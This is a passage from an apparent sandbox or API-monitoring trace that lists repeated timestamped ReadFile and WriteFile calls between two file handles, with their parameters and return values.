lpOverlapped=0x0) returned 1 [0025.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x191, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.545] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.545] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.546] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.547] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.547] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.549] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.549] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.551] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.551] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.553] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.553] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.554] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.554] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.555] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.555] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.556] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.556] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.557] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.557] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.558] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.558] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.559] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.559] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.560] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.560] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.561] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.561] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.562] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.563] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.563] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.563] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.564] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.565] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x336, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.566] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.566] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.567] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.567] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.569] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.569] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.570] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.570] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x212, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.572] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.573] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.573] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.576] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.576] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.577] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.578] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.579] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.581] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.582] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.582] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.584] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.584] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.584] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.585] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.586] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.588] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.589] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.591] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.591] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.594] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.594] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, 